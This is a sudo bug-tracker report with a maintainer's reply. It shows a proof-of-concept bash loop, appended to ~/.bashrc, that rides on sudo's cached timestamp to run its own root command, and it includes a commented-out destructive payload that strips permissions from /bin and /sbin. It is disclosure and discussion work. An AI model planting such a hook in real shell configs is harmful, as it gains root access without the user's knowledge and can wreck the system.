Bugzilla – Bug 377
Timestamp exploit by programmatically launching another sudo command shortly after.
Last modified: 2009-12-08 10:27:53 MST
The timestamp capability of sudo, as shipped with Ubuntu by default, can be exploited to execute another command after the user start his/her own command. Consider appending the following script to ~/.bashrc: It waits for the user to launch a sudo-enhanced program. (This obviously also works if NOPASSWD is set for the user.) # this exploits sudo's timout capability by launching another command when # the user did some sudo command shortly before. MAXAGE=100 while sleep 10 do pgrep -f -U 0 -P $PPID,$$ && { echo parent has a root owned child process id=$(pgrep -f -U 0 -P $PPID,$$ | head -n1) # wait $id age=$(($(date +%s) - $(stat /proc/$id/ -c '%Y'))) if [ "$age" -lt "$MAXAGE" ]; then echo the child is young # launch next stage payload # sudo chown -x /bin/* /sbin/* sudo id fi } done & # Note that any program can reach root by waiting for the user to launch any sudo command. Ideally, sudo (or PolicyKit) should be able to tell whether the command came from the keyboard, or a program. This, however is not possible. A workaround is to disable timestamps. This might be related to http://www.sudo.ws/bugs/show_bug.cgi?id=357 What measures can be taken to mitigate this? Would you consider this a security bug, or the normal behaviour of sudo? What should distros/users do about it?
This is normal sudo behavior. Sites that wish to disable the timestamps may do so. The point of the timestamp file is to provide a middle ground between the convenience of using a root shell and the security of requiring a password for each root command. If someone is able to write to your .bashrc your account is effectively compromised as it is possible to invoke a keylogger to read the password used for sudo (or anything else). As such, I don't think this is a sudo-specific problem.